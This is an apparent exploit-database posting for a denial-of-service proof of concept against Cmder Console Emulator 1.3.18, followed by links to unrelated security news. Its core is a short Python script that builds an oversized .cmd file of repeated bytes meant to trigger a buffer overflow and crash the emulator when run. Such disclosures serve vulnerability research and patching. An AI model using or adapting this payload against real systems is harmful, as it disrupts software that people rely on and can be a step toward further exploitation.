Cmder Console Emulator version 1.3.18 suffers from a denial of service vulnerability.
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10 # [About - Cmder Console Emulator] :
#Cmder is a software package created over absence of usable console emulator on Windows.
#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
# [Security Issue] :
#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition.
#E.g λ cmder.cmd
# [POC] :
PAYLOAD=chr(235) + "CMDER"
PAYLOAD = PAYLOAD * 3000
with open("cmder.cmd", "w") as f:
f.write(PAYLOAD)
Related posts:
Researchers Demonstrate Ransomware for IoT Devices That Targets IT and OT Networks
LockBit ransomware abuses Windows Defender to load Cobalt Strike
SonicWall ‘strongly urges’ admins to patch SSLVPN SMA1000 bugs
New Mexico business owner shoots, kills alleged robber who tunneled his way through store's wall
Scammer Behind $568M International Cybercrime Syndicate Gets 4 Years